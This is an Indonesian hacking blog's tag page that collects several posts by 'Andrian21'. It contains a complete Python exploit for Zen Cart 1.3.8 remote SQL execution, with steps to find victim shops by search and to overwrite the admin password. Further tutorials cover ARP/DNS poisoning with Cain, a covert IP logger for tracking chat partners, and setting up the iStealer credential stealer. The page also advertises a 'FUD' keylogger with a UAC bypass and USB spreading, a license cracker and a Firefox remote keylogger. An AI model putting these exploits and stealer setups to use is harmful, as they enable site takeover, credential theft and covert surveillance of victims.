Tampilkan postingan dengan label Hacking Tools. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking Tools. Tampilkan semua postingan

Tutorial Hacking Facebook With SET

Andrian21 - Udah Lama Nih Andrian21 Engga Share Tutorial Tentang Hacking.
Kali Ini Nih Andrian21 Mau Share Tutorial Hacking Facebook With SET, Nih Langsung Aja Liat Video Tutorialnya, Soalnya Ane Cape Ngetiknya Hahaha :D


Jangan Lupa Sekalian Like + Subscribe Videonya Ya Bro :)

Tutorial Zen Cart 1.3.8 Remote SQL Execution


 Andrian21 - PertamaTama , Buka Google Dan Ketikan "Powered By Zencart"


pilih salah satu site untuk di jadikan victim, kemudian save dulu source python di bawah ini :

 #
   # ------- Zen Cart 1.3.8 Remote SQL Execution
   # http://www.zen-cart.com/
   # Zen Cart Ecommerce - putting the dream of server rooting within reach  of anyone!
   # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
   #
   # BlackH :)
   #
   #
   # Notes: must have admin/sqlpatch.php enabled
   #
   # clean the database :
   #    DELETE FROM `record_company_info` WHERE `record_company_id` =  (SELECT `record_company_id` FROM `record_company` WHERE  `record_company_image` = '8d317.php' LIMIT 1);
   #    DELETE FROM `record_company` WHERE `record_company_image` =  '8d317.php';
   
   import urllib, urllib2, re, sys
   
   a,b = sys.argv,0
   
   def option(name, need = 0):
   global a, b
   for param in sys.argv:
   if(param == '-'+name): return str(sys.argv[b+1])
   b = b + 1
   if(need):
   print '\n#error', "-"+name, 'parameter required'
   exit(1)
   
   if (len(sys.argv) < 2):
   print """
   =____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
   ========================================================================
   |                  BlackH                            |
   ========================================================================
   |                                                                       |
   | $system> python """+sys.argv[0]+""" -url                         |
   | Param:       ex: http://victim.com/site (no  slash)              |
   |                                                                       |
   | Note: blind "injection"                                               |
   ========================================================================
   """
   exit(1)
   
   url, trick = option('url', 1), "/password_forgotten.php"
   
   while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req =  urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute",  urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements  processed',urllib2.urlopen(req).read())):
   print '>> success (', cmd, ")"
   else:
   print '>> failed, be sure to end with ; (', cmd, ")"
 save source di atas dengan extensi .py misal zen.py
sebelum nya komputer kamu instal dlu pithon nya ,
kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kemudian buka terminal (CMD), misal zen.py
kamu taruh di desktop bearti cmd di arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com

contohh : zen.py -url http://customizthat.com/2010/admin/ <-enter
trus nanti ada tulisan $sql@jah
jika ada tulisan itu
bearti masukin
perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

kalo sudah succes, tinggal di url target ditambahin /admin/
kalo succes setiap username sama pasword nya itu adminz , Semoga Sukses

Tutorial DNS Cache Poisoning

i786.photobucket.com/albums/yy144/chempreng/cakil1.jpg


1,2, dan 3 adalah komputer

1.adalah komputer gateway,atau istilah nya router (172.128.254.1)

2.adalah komputer target (172.128.254.10)

3.adalah hacker atau penyerang menggunakan cain

Note:IP yang di gunakan cuma buat tutorial aja
pekerjaan kita dilakukan di komputer 3:
1.setelah install Cain,Buka dan pergi ke Tab Sniffer
2.Klik di Configure dan pilih adapter kalian

i786.photobucket.com/albums/yy144/chempreng/cakill2.jpg

3.nyalakan Sniffer (klik di tombol ke 2 setelah tmbol Open di tool bar)
4.Klik kanan di area kosong dan pilih Scan MAC adresses.kita bisa melihat hasil nya
seperti diatas (gambar)
5.Klik di APR tab

i786.photobucket.com/albums/yy144/chempreng/cakill3.jpg

i786.photobucket.com/albums/yy144/chempreng/cakill3.jpg

6.klik tombol plus (+) di tool bar dan add ARP Poison routing

i786.photobucket.com/albums/yy144/chempreng/cakilll4.jpg

7.Pilih Gateway (router) disini adalah 172.128.254.1 ,di list table disebelah nya
akan ada Ip komputer 2 yaitu 172.128.254.10.klik Ok

i786.photobucket.com/albums/yy144/chempreng/cakill5.jpg

8.Sekarang Klik di APR-DNS tab

i786.photobucket.com/albums/yy144/chempreng/cakilll6.jpg

9.klik Tombol plus (+)
10.masukan web address yang kalian ingin spoof,
( contoh nya jika korban membuka facebook dia akan di redirect ke myspace)
klik di tombol resolve dan ketik web address yang akan menjadi tujuan redirect,
klik ok,dan kalian akan mendapatkan Ip dari web address tersebut.lalu Klk Ok

i786.photobucket.com/albums/yy144/chempreng/cakill7.jpg

kalian akan memdapatkan sesuatu seperti ini:

11.Sekarang untuk membuat semua nya bekerja kita harus me-enable ARP poisoning,
Klik di icon di sebelah sniffer icon,dan semua nya akan berjalan sesuai yang kita inginkan

sekrang komputer 2 jalur nya telah di poisoned,saat user merequest
http://www.facebook.com dia akan di redirect ke http://www.myspace.com

atau pake Backtrack

bisa di tonton disini http://www.youtube.com/watch?v=JtMA5L8fxRE

How to Find the IP Address of a Remote Computer

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.


1. Download the IP Finder script (IP_Finder.ZIP) that I have from Here.

2. Open Any free host that supports PHP

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.


For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as hacker, then your IP Finder link would be

http://hacker.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his/her IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://hacker.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Tuesday 30th of March 2010 05:31:27 PM
59.45.144.237 Tuesday 30th of March 2010 05:31:28 PM
123.92.144.237 Tuesday 30th of March 2010 05:31:31 PM

Enjoy :)

Nod32 Anti Virus License Tools



Tool ini berfungsi untuk mencari username dan password eset nod 32 yang full dan trial :
Download : http://depositfiles.com/files/4h5q16tzj]http://depositfiles.com/files/4h5q16tzj | 749.27Kb support juga eset nod32 ver 5 allversion

Enjoy :)

Download Istealer 6.3 [Full Tutor]

saya udah tau ini agak lama, tp mengingat banyak juga yg belum tau jd saya share aja itung2 buat re-learn juga ...
oke, tanpa saba-sibi kita langsung ke tutornya, ini tutor saya dapet infonya dari forum luar jd dgn kata lain bukan Ori dari saya :D

Istealer bisa didownload di : http://www.mediafire.com/?o4mxobb9of2m7
* nb : matiin dulu AVnya, tp klo ga percaya silahkan cari lagi softwarenya di tempat yg lain (sana-sini kedetect semua)

Tutornya :
  HowTo

1.Goto 000webhost, lalu daftar dengan akun baru.

2.Setelah daftar, klik go to the c panel
[Image: 331214-1.jpeg]

3.Saat di cpanel click MySql dibawah bagian software/services.
[Image: 331215-2.jpeg]

4. Sekarang kita dah siap untuk membuat DB.Isi form dengan sebuah nama database /db user name and sebuah password. Masukan aja yg bisa kamu ingat dengan mudah. (jangan kelupaan, nanti keilangan laba )
[Image: 331216-3.jpeg]

5. Setelah selesai, klik Create Database and simpan informasi DB kedalam notepad atau yg lainnya biar ga kelupaan.
[Image: 331217-4.jpeg]

6. Sekarang buka index.php pada folder php logger menggunakan notepad, word-pad, atau yg lainnya.

7. Konfigurasikan index.php dengan data dari DB-mu tadi.
[Image: 331233-15.jpeg]
setelah selesai, langsung close dan save/simpan.

8. Kembali ke 000webhost lalu ke File Manager.

9. Masuk ke Direktori public_html.

10. Di public_html folder klik pada upload dan pilih file index.php dan style.css yang tadi diedit.
[Image: 331226-8.jpeg]

11. Setelah selesai langsung kembali ke direktori public_html tadi.Sekarang kita ganti chmod/permissionnya seperti contoh dibawah
[Image: 331227-9.jpeg]
Lalu
[Image: 331228-10.jpeg]

12. Nah, hampir selesai :D skrg kita langsung buka domain kita yg dari hasil registrasi tadi.
[Image: 331230-12.jpeg]

14.Buka iStealer 6.3 Legends.exe dan masukkan domain kamu seperti ini.
[Image: 331231-13.jpeg]

15.Setelah semuanya benar, akan ada notifikasi "works perfect!" . Sekarang langsung bind aja soft/file yg mau kamu bind dan lihat hasilnya di domain kamu tadi
Maaf klo agak mumet, saya orangnya emg tidak pandai berkata2
tp yg penting share

Jumpa lagi di tutor selanjutnya ;) 

Rapzo Logger v1.5 Keylogger

[Image: 92564171.jpg]

[Image: op2wo.jpg]

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers


[Image: fine2.jpg]

Scan virus :

[Image: 26556093.jpg]

Download
klik sini

Boost Firefox with SpeedyFox


[Image: 311wbig.png]
Your Firefox is working slowly?

Email Checker/scanner

ini ane share alat tempur email checker/scanner yahoo/gmail/hotmail/aol dll asal tau host dan port POP3 nya

for ex code dibawah ini hotmail checker
utk email yg lain seperti yahoo, gmail dan aol silahkan cari host dan port POP3 nya masing masing :P
tinggal ubah ini
#host dan port
SAVEFILE = 'Hasil-hotmail.txt'
HOST = 'pop3.live.com'
PORT = 995

Cara Membuat Remote Keylogger FireFox [add ons]

disini gw bakalan share dikit tutotial bikin remote keylogger firefox, nah apa tanpa penjelasan yang panjang lebar, mending kita mulai aja.. yang udah tau langsung close browser soalnya udh rada lawas :D

yang dibutuhin adalah :

a. hosting/shell
b. file remote keylogger firefox

1. tahap pertama yang kita butuhin yaitu file utuk bahan2 keylogger, nah file2 ini bisa di download disini : http://186.129.24...fox-KL.zip
didalam nya terdapat beberapa file yaitu :

WebCruiser Web Vulnerability Scanner Enterprise


[Image: WebCruiser-string-terbaru.png]



WebCruiser Web Vulnerability Scanner adalah s'buah p'rangkat l'nak p'netrasi web yang efektif n' kuat yang akan m'bantu xta d'lam m'audit websiten' blog.. .. Tool ini j'ga m'miliki scanner k'rentanan n' s'kaian alat k'amanan .. ..



Fitur WebCruiser Web Vulnerability Scanner Enterprise :


* SQL Injection Tool pertama untuk Windows 7, Windows Vista
* Web Vulnerability Scanner
* SQL Injection Scanner
* Cross Site Scripting Scanner
* XPath Injection Scanner
* Automatic SQL Injection Tool (POC)
* Cross Site Scripting Tool (POC)
* XPath Injection Tool (POC)
* Post Data Resend Tool


Fitur Terbaru Webcruiser:


* Crawler(Site Directori dan File)
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
* SQL Injection Scanner
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
* SQL Injection for SQL Server: PlainText/Union/Blind Injection
* SQL Injection for MySQL: PlainText/Union/Blind Injection
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
* SQL Injection for DB2: Union/Blind Injection
* SQL Injection for Access: Union/Blind Injection
* Post Data Resend
* Cross Site Scripting Scanner and POC
* XPath Injection Scanner and POC
* Auto Get Cookie From Web Browser For Authentication
* Report Output.

[TOOLS]Jsky Vulnerabilities Scanner

Hala Bertemu Lagi Dengan Saya (Andrian21) Di Acara It's Me , wkakkaka :D
Langsung Aja Yee , Nih Ane Nemu Barusan (Masih Anget) xixixi :D
Ini Tools Gunaya Untuk Mengecek Suatu Website , Apakah Website Tersebut Vuln/Bisa Kita Inject =))
Ini Tools Juga Berguna Loh Buat Para Webmaster , Untuk Ngecek Di Web Kalian Ituh Ada Bug'a Atau Tidak..

(Hati-Hati Jangan Keduluan Sama Orang Jahat) Nanti Kena cR00t Deh Web Kalian Ama Orang Yang Engga Bertanggung Jawab , Maka Silahkan Deh Cek Terus Web Kalian , Kalo Ada Bug'a Siap² Kena Deh Owow kwakka :D Kalo Kalian Engga Cepet² Nambel Tuh Bug'a =)) 
Ok Deh Kita Mulai :)



[Image: jsky18.jpg?imgmax=800]

Fitur:
* SQL Injection
* XSS
* Unsecure object using
* Local path disclosure
* Unsecure directory permissions
* Server vulnerabilities like buffer overflow and configure error
* Possible sensitive directories and files scan
* Backup files scan
* Source code disclosure
* Command Execute
* File Include
* Web backdoor
* Sensitive information

 Download Here

Cukup Sekian Deh :)
 
© Andrian21 All Rights Reserved